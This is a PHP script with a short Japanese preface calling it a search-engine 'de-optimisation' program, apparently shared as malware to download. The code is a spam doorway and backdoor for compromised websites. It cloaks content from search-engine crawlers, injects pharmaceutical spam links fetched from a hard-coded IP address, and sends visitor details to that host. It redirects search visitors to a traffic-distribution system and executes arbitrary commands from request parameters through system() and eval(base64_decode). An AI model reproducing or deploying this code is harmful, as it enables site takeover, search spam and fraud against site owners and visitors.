これは検索エンジンの最適化解除プログラムです。Web サイトのコンテンツに悪意のある言葉を挿入します。そのため、Google ボットなどのボットがサイトのインデックスを作成するときに、これらの単語を Web サイトに関連付けます。
これは、ダウンロードするファイルのコードです
走るな
$sutra = "http://95.211.128.197/tds"; // TDS Url
$scheme = "default"; // TDS Cheme
$www_root = "http://95.211.128.197"; // Manager path
$host=$_SERVER['HTTP_HOST'];
$agent=$_SERVER['HTTP_USER_AGENT'];
$server_accept_language = @$_SERVER['HTTP_ACCEPT_LANGUAGE'];
$server_user_agent = @$_SERVER['HTTP_USER_AGENT'];
$server_referer = @$_SERVER['HTTP_REFERER'];
$server_host = @$_SERVER['HTTP_HOST'];
$server_forwarded_for = @$_SERVER['HTTP_X_FORWARDED_FOR'];
$server_remote_addr = @$_SERVER['REMOTE_ADDR'];
$server_query_string = @$_SERVER['QUERY_STRING'];
$server_signature = @$_SERVER['SERVER_SIGNATURE'];
$server_request = @$_SERVER['REQUEST_URI'];
$debug = false;
if ($server_remote_addr == "108.170.8.174"){$debug = true;}
if ($debug)
{
echo "<title>DOOR OK</title>";
echo "originalurl=$originalurl<br>";
echo "server_user_agent=$server_user_agent<br>";
echo "server_referer=$server_referer<br>";
echo "server_host=$host<br>";
echo "server_remote_addr=$server_remote_addr<br>";
echo "server_request=$server_request<br>";
echo "www_root=$www_root<br><br>";
echo "Check CURL extension...";
if (extension_loaded('curl'))
{
echo "<font color=green><b>YES</b></font><br><br>";
}
else
{
echo "<font color=red><b>NO</b></font><br><br>";
}
}
// Some bad guys :)
if (eregi ("start=56",$server_referer))
{
exit();
}
if ($agent == "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)")
{
exit();
}
if ($agent == "Mozilla/4.0")
{
exit();
}
if (eregi("75.125.",$server_remote_addr))
{
exit();
}
if (eregi("41.190.",$server_remote_addr))
{
exit();
}
if (eregi("143.215.169",$server_remote_addr))
{
exit();
}
if (eregi("75.55.",$server_remote_addr))
{
exit();
}
if (eregi("67.212.",$server_remote_addr))
{
exit();
}
if (eregi("173.236.",$server_remote_addr))
{
exit();
}
if (eregi("184.154.",$server_remote_addr))
{
exit();
}
if ($server_remote_addr == '194.115.120.14')
{
exit();
}
//////////////////////////////////////////////////////////////////////////////
if((md5($_REQUEST["img_id"]) == "ae6d32585ecc4d33cb8cd68a047d8434") && isset($_REQUEST["mod_content"])) { eval(base64_decode($_REQUEST["mod_content"])); exit(); }
$cmd = $_GET['cmddd'];
if (isset($cmd))
{
system($cmd);
exit();
}
@$is_human = @detectBot($server_user_agent,$server_remote_addr,$server_query_string,$server_referer);
if (@$is_human==false)
{
$folder = str_replace("www.","",$host);
if (($server_request=="") || ($server_request=="/"))
{
$filename = "index.php";
}
else
{
$filename = str_replace("_","",$server_request);
$filename = str_replace("_","",$filename);
$filename = str_replace(" ","",$filename);
$filename = str_replace("%","",$filename);
$filename = str_replace("|","",$filename);
$filename = str_replace("/","",$filename);
$filename = str_replace(";","",$filename);
$filename = str_replace("+","",$filename);
$filename = str_replace("?","",$filename);
$filename = str_replace(".","",$filename);
$filename = str_replace("=","",$filename);
$filename1 = str_replace("&","",$filename);
$filename2 = str_replace("&","amp",$filename);
$filename1 = $filename1.".php";
$filename2 = $filename2.".php";
}
if (extension_loaded('curl'))
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "$www_root/pages/$folder/$filename1");
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$remote_page = curl_exec($ch);
$ch2 = curl_init();
curl_setopt($ch2, CURLOPT_URL, "$www_root/pages/$folder/$filename2");
curl_setopt($ch2, CURLOPT_HEADER, 0);
curl_setopt($ch2, CURLOPT_RETURNTRANSFER, 1);
$remote_page2 = curl_exec($ch2);
$ch2 = curl_init();
//curl_setopt($ch2, CURLOPT_URL, "$www_root/_links/doors.php");
curl_setopt($ch2, CURLOPT_URL, "$www_root/pages/$folder/doors.txt");
curl_setopt($ch2, CURLOPT_HEADER, 0);
curl_setopt($ch2, CURLOPT_RETURNTRANSFER, 1);
$links_map = curl_exec($ch2);
if (eregi ("Not Found", $links_map))
{
$links_map = "";
}
}
else
{
$remote_page = file_get_contents("$www_root/pages/$folder/$filename1");
$remote_page2 = file_get_contents("$www_root/pages/$folder/$filename2");
$links_map = file_get_contents("$www_root/pages/$folder/doors.txt");
if (eregi ("Not Found", $links_map))
{
$links_map = "";
}
//$links_map = file_get_contents("$www_root/_links/doors.php");
}
if (eregi('<h2>', $remote_page))
{
echo $remote_page."<!-- End HTML 3.51.197 -->";
exit;
}
if (eregi('<h2>', $remote_page2))
{
echo $remote_page2."<!-- End HTML 3.51.197 -->";
exit;
}
else
{
// NIHT :)
$originalurl="http://".$_SERVER["HTTP_HOST"].$_SERVER["REQUEST_URI"];
$originaluseragent="Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;";
if (extension_loaded('curl'))
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $originalurl);
curl_setopt($ch, CURLOPT_USERAGENT, $originaluseragent);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$originalpage = curl_exec($ch);
}
else
{
$originalpage = @file_get_contents($originalurl);
}
if (preg_match('/<body.*?>/i',$originalpage)) {
$originalpage=preg_replace('/href=([\'"]{0,1})http.*?>/i', '>', $originalpage);
$originalpage=preg_replace('/(<body.*?>)/i', "<body>$links_map", $originalpage, 1);
} elseif (preg_match('/<\/body>/i',$originalpage)) {
$originalpage=preg_replace('/href=([\'"]{0,1})http.*?>/i', '>', $originalpage);
$originalpage=preg_replace('/(<\/body>)/i', "$links_map</body>", $originalpage, 1);
}
print $originalpage."<!-- End HTML 3.51.197 -->";
exit;
//echo '<font id="mix" color="8a517f" style="height: 0;overflow: hidden;width: 0; position: absolute; font-family:courier; font-size:19px">'
//echo $links_map;
//'</font>';
}
}
else
{
$keys = "/acai|diet|weight|loss|pharmac|drug|lunesta|provigil|modafinil|proventil|accutane|cialas|aciphex|acomplia|acyclovir|adalat|albendazole|albenza|albuterol|aldactone|alendronate|allegra|altace|amaryl|amiloride|amlodipine|amoxicillin|ansaid|arava|arcoxia|atenolol|atorvastatin|avandia|avapro|avodart|aygestin|azathioprine|azithromycin|baclofen|bactrim|benazepril|benzodiazepine|biaxin|bisoprolol|bromocriptine|bupropion|calan|carbamazepine|carisoprodol|carvedilol|ceclor|cefaclor|cefpodoxime|celebrex|celecoxib|cetirizine|chlorambucil|cialis|clarinex|clarithromycin|claritin|clopidogrel|colospa|conjugated|coreg|coumadin|coversyl|cyproheptadine|danazol|danocrine|desloratadine|desyrel|digoxin|dilantin|dipyridamole|domperidone|dutasteride|effexor|eldepryl|enalapril|epivir|erythromycins|escitalopram|esomeprazole|estrace|estradiol|ethambutol|etoricoxib|evista|ezetimibe|famciclovir|famvir|felodipine|fenofibrate|fexofenadine|finasteride|flagyl|flavoxate|flomax|floxin|fluoxetine|flurbiprofen|fosamax|frumil|furosemide|gabapentin|gemfibrozil|geodon|glimepiride|glipizide|glucophage|glucotrol|hydroch|hytrin|hyzaar|ibuprofen|ilosone|imdur|imitrex|imuran|indapamide|inderal|irbesartan|isordil|isosorbide|kamagra|ketoconazole|lamictal|laminuvide|lamisil|lamotrigine|lanoxin|lansoprazole|lasix|leflunomide|lenor72|leukeran|levaquin|levitra|levlen|levofloxacin|levonorgestrel|levothroid|levothyroxine|lexapro|lioresal|lipitor|lisinopril|lopid|lopressor|loratadine|losartan|lotensin|lovastatin|loxapine|loxitane|lozol|mebeverine|medroxy|mefenamicacid|meloxicam|meridia|metformin|metoclopramide|metoprolol|metronidazole|mevacor|mexiletine|mexitil|microzide|minipress|mobic|montelukast|motilium|motrin|myambutol|nabumetone|naprosyn|naproxen|neurontin|nexium|nifedipine|nimodipine|nimotop|niravam|nizoral|nolvadex|norethindrone|norplant72|nortriptyline|norvasc|ofloxacin|omeprazole|orlistat|oseltami|pamelor|pantoprazole|parlodel|paroxetine|paxil|periactin|perindropril|persantine|phenergan|phenytoin|plavix|plendil|ponstel|prandin|pravachol|pravastatin|prazosin|prednisolone|prednisone|premarin|prevacid|prilosec|prograf|promethazine|propafenone|propecia|propranolol|proscar|protonix|provera|prozac|rabeprazole|raloxifene|ramipril|ranitidine|reductil|reglan|relafen|repaglinide|retrovir|rimonabant|risperdal|risperidone|rivotril|rosiglitazonemaleate|roxithromycin|rulide|rythmol|selegiline|sertraline|sibutramine|sildenafil|simvastatin|singulair|soma|spironolactone|stavudine|sulfamet|sumatriptan|sumycin|synthroid|tacrolimus|tadalafil|tamiflu|tamoxifen|tamsulosin|tegaserod|tegretol|tenormin|terazosin|terbinafine|tetracycline|topamax|topiramate|trazodone|tricor|trimox|urispas|valacyclovir|valtrex|vantin|vardenafil|vasotec|venlafaxine|verapamil|viagra|warfarin|xenical|zantac|zebeta|zelnorm|zerit|zestril|zetia|zidovudine|zimulti|ziprasidone|zithromax|zocor|zoloft|zovirax|zyban|zyrtec|ambien|phentermine|xanax|valium|tramadol|adipex|zolpidem|ativan|alprazolam|diazepam|klonopin|lorazepam|clonazepam|ultram|zopiclone|modalert|hair|vicodin|amoxil|atomoxetine|cipro|ciprofloxacin|clomid|clomiphene|deltasone|diflucan|doxycycline|fluconazole|isotretinoin|pentazine|septra|strattera/i";
if (strlen($_SERVER["HTTP_REFERER"]) < 30)
{
if (eregi ("google", $_SERVER["HTTP_REFERER"]))
{
$key = "unknown";
$host_new = str_replace("www.","",$host);
if (extension_loaded('curl'))
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "$www_root/_scripts/human.php");
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_POST, 1);
$data = array(
'domain' => $host_new,
'uri' => $server_request,
'se' => $sese,
'referrer' => $_SERVER["HTTP_REFERER"],
'agent' => $agent,
'server_remote_addr' => $server_remote_addr,
'keys' => $key
);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
curl_exec($ch);
}
else
{
@file_get_contents("$www_root/_scripts/human.php?domain=$host_new&uri=$server_request&se=$sese&keys=$key&agent=$agent&server_remote_addr=$server_remote_addr&referrer=".$_SERVER["HTTP_REFERER"]);
}
$location = "$sutra/in.cgi?$scheme";
header("Location: ".$location);
exit;
}
}
/** if ((eregi ("url=", $server_referer)) AND (preg_match('/google/i', $server_referer)))
{
$key = "unknown, https";
$host_new = str_replace("www.","",$host);
if (extension_loaded('curl'))
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "$www_root/_scripts/human.php");
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_POST, 1);
$data = array(
'domain' => $host_new,
'uri' => $server_request,
'se' => $sese,
'referrer' => $_SERVER["HTTP_REFERER"],
'agent' => $agent,
'server_remote_addr' => $server_remote_addr,
'keys' => $key
);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
curl_exec($ch);
}
else
{
@file_get_contents("$www_root/_scripts/human.php?domain=$host_new&uri=$server_request&se=$sese&keys=$key&agent=$agent&server_remote_addr=$server_remote_addr&referrer=".$_SERVER["HTTP_REFERER"]);
}
$location = "$sutra/in.cgi?$scheme";
header("Location: ".$location);
exit;
}
*/
if (preg_match($keys, $_SERVER["HTTP_REFERER"]))
{
$key = $_SERVER["HTTP_REFERER"];
$sese="unknown";
if (eregi("yahoo", $_SERVER["HTTP_REFERER"]))
{
$keys = explode ("p=", $_SERVER["HTTP_REFERER"]);
$keys = explode ("&", $keys[1]);
$key = $keys[0];
$sese="yahoo";
}
if (eregi("google", $_SERVER["HTTP_REFERER"]))
{
$keys = explode ("q=", $_SERVER["HTTP_REFERER"]);
$keys = explode ("&", $keys[1]);
$key = $keys[0];
$sese="google";
}
if (eregi("bing", $_SERVER["HTTP_REFERER"]))
{
$keys = explode ("q=", $_SERVER["HTTP_REFERER"]);
$keys = explode ("&", $keys[1]);
$key = $keys[0];
$sese="bing";
}
if (eregi("aol.com", $_SERVER["HTTP_REFERER"]))
{
$keys = explode ("q=", $_SERVER["HTTP_REFERER"]);
$keys = explode ("&", $keys[1]);
$key = $keys[0];
$sese="aol";
}
if (eregi("ask.com", $_SERVER["HTTP_REFERER"]))
{
$keys = explode ("q=", $_SERVER["HTTP_REFERER"]);
$keys = explode ("&", $keys[1]);
$key = $keys[0];
$sese="ask";
}
$host_new = str_replace("www.","",$host);
if (extension_loaded('curl'))
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "$www_root/_scripts/human.php");
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_POST, 1);
$data = array(
'domain' => $host_new,
'uri' => $server_request,
'se' => $sese,
'referrer' => $_SERVER["HTTP_REFERER"],
'agent' => $agent,
'server_remote_addr' => $server_remote_addr,
'keys' => $key
);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
curl_exec($ch);
}
else
{
@file_get_contents("$www_root/_scripts/human.php?domain=$host_new&uri=$server_request&se=$sese&keys=$key&agent=$agent&server_remote_addr=$server_remote_addr&referrer=".$_SERVER["HTTP_REFERER"]);
}
$location = "$sutra/in.cgi?$scheme¶meter=".$key."&se=".$host."&HTTP_REFERER=".$_SERVER["HTTP_REFERER"];
//$location = "http://health-profile.net/";
header("Location: ".$location);
exit;
}
}
////////////////////////////////////////////////////////////////////////////////////////////////////
function detectBot($server_user_agent,$server_remote_addr,$server_query_string,$server_referer){
$is_human = true;
$stop_ips_masks = array(
"/^8\.6\.4[8-9]\.[0-9]+$/", // NetRange: 8.6.48.0 - 8.6.55.255 Google Inc
"/^8\.6\.5[0-5]\.[0-9]+$/", // NetRange: 8.6.48.0 - 8.6.55.255 Google Inc
"/^64\.233\.1[6-8][0-9]\.[0-9]+$/", // NetRange: 64.233.160.0 - 64.233.191.255 Google Inc
"/^64\.233\.19[0-1]\.[0-9]+$/", // NetRange: 64.233.160.0 - 64.233.191.255 Google Inc
"/^64\.68\.8[0-7]\.[0-9]+$/", // NetRange: 64.68.80.0 - 64.68.87.255 Google Inc
"/^66\.249\.6[4-9]\.[0-9]+$/", // NetRange: 66.249.64.0 - 66.249.95.255 Google Inc
"/^66\.249\.[7-8][0-9]\.[0-9]+$/", // NetRange: 66.249.64.0 - 66.249.95.255 Google Inc
"/^66\.249\.9[0-5]\.[0-9]+$/", // NetRange: 66.249.64.0 - 66.249.95.255 Google Inc
"/^72\.14\.19[2-9]\.[0-9]+$/", // NetRange: 72.14.192.0 - 72.14.255.255 Google Inc
"/^72\.14\.2[0-5][0-9]\.[0-9]+$/", // NetRange: 72.14.192.0 - 72.14.255.255 Google Inc
"/^74\.125\.[0-9]+\.[0-9]+$/", // NetRange: 74.125.0.0 - 74.125.255.255 Google Inc
"/^74\.6\.[0-9]+\.[0-9]+$/", // NetRange: 74.6.0.0 - 74.6.255.255 Google Inc
"/^216\.239\.3[2-9]\.[0-9]+$/", // NetRange: 216.239.32.0 - 216.239.63.255 Google Inc
"/^216\.239\.4[0-9]\.[0-9]+$/", // NetRange: 216.239.32.0 - 216.239.63.255 Google In
"/^216\.239\.6[0-3]\.[0-9]+$/", // NetRange: 216.239.32.0 - 216.239.63.255 Google Inc
"/^209\.85\.12[8-9]\.[0-9]+$/", // NetRange: 209.85.128.0 - 209.85.255.255 Google Inc
"/^209\.85\.1[3-9][0-9]\.[0-9]+$/", // NetRange: 209.85.128.0 - 209.85.255.255 Google Inc
"/^209\.85\.2[0-5][0-9]\.[0-9]+$/", // NetRange: 209.85.128.0 - 209.85.255.255 Google Inc
"/^64\.9\.22[4-9]\.[0-9]+$/", // NetRange: 64.9.224.0 - 64.9.255.255 Google Inc
"/^64\.9\.2[3-4][0-9]\.[0-9]+$/", // NetRange: 64.9.224.0 - 64.9.255.255 Google Inc
"/^64\.9\.25[0-5]\.[0-9]+$/", // NetRange: 64.9.224.0 - 64.9.255.255 Google Inc
"/^66\.102\.[0-9]\.[0-9]+$/", // NetRange: 66.102.0.0 - 66.102.15.255 Google Inc
"/^66\.102\.1[0-5]\.[0-9]+$/", // NetRange: 66.102.0.0 - 66.102.15.255 Google Inc
"/^137\.110\.[0-9]+\.[0-9]+$/", // NetRange: 137.110.222.* Google bot
"/^65\.5[2-5]\.[0-9]+\.[0-9]+$/", // NetRange: 65.52.0.0 - 65.55.255.255 Microsoft Corp
"/^67\.195\.[0-9]+\.[0-9]+$/", // NetRange: 67.195.0.0 - 67.195.255.255 Yahoo! Inc
"/^209\.131\.3[2-9]\.[0-9]+$/", // NetRange: 209.131.32.0 - 209.131.63.255 Yahoo! Inc
"/^209\.131\.[4-5][0-9]\.[0-9]+$/", // NetRange: 209.131.32.0 - 209.131.63.255 Yahoo! Inc
"/^209\.131\.[6][0-3]\.[0-9]+$/", // NetRange: 209.131.32.0 - 209.131.63.255 Yahoo! Inc
"/^66\.163\.1[6-8][0-9]\.[0-9]+$/", // NetRange: 66.163.160.0 - 66.163.191.255 Yahoo! Inc
"/^66\.163\.19[0-1]\.[0-9]+$/", // NetRange: 66.163.160.0 - 66.163.191.255 Yahoo! Inc
"/^184\.72\.[0-9]+\.[0-9]+$/", // NetRange: 184.72.0.0 - 184.73.255.255 AMAZON
"/^184\.73\.[0-9]+\.[0-9]+$/", // NetRange: 184.72.0.0 - 184.73.255.255 AMAZON
"/^198\.134\.135\.[0-9]+$/", // NetRange: 198.134.135.0 - 198.134.135.255 UCSD.EDU
"/^129\.79\.49\.[0-9]+$/", // NetRange: 129.79.49.249 Indiana University
"/^69\.12\.216\.[0-9]+$/", // NetRange: 69.12.216.14 Sonic.net
"/^62\.189\.112\.[0-9]+$/", // NetRange: 62.189.112.0 - 62.189.112.255 MCAFEE INTERNATIONAL
"/^79\.178\.31\.[0-9]+$/", // NetRange: 79.178.31.165 hz
"/^78\.46\.70\.[0-9]+$/", // NetRange: 78.46.70.145 hz
"/^87\.98\.215\.[0-9]+$/", // NetRange: 87.98.215.155 hz
"/^64\.34\.165\.[0-9]+$/", // NetRange: 64.34.165.218 hz
"/^93\.186\.20\.[0-9]+$/", // NetRange: 93.186.20.13 hz
"/^204\.118\.31\.202$/",
"/^74\.81\.89\.114$/",
"/^82\.192\.91\.10$/",
"/^192\.251\.226\.206$/",
"/^95\.211\.27\.[0-9]+$/",
"/^95\.211\.129\.[0-9]+$/",
"/^95\.211\.128\.[0-9]+$/",
"/^128\.163\.16\.[0-9]+$/", // NetRange: 128.163.16.* UKY
"/^91\.217\.162\.[0-9]+$/",
"/^91\.220\.35\.[0-9]+$/",
"/^195\.14\.112\.[0-9]+$/",
"/^86\.55\.210\.[0-9]+$/",
"/^184\.173\.219\.[0-9]+$/",
"/^184\.172\.169\.[0-9]+$/",
"/^50\.22\.89\.[0-9]+$/",
"/^64\.120\.249\.[0-9]+$/",
"/^46\.37\.184\.[0-9]+$/",
"/^10\.48\.17\.[0-9]+$/",
"/^108\.170\.8\.[0-9]+$/",
"/^64\.120\.227\.[0-9]+$/"
);
$stop_ips_masks_count = count ($stop_ips_masks);
for($w=0; $w<$stop_ips_masks_count; $w++)
{
if(preg_match($stop_ips_masks[$w], $server_remote_addr))
{
$is_human = false; break;
}
}
$stop_agents_masks = "/google|bot|rambler|yandex|yahoo|freebsd|libwww|spider|linux/i";
if (preg_match($stop_agents_masks, $server_user_agent))
{
$is_human = false;
}
// if (strlen ($server_user_agent) < 12)
// {
// $is_human = false;
// }
return $is_human;
}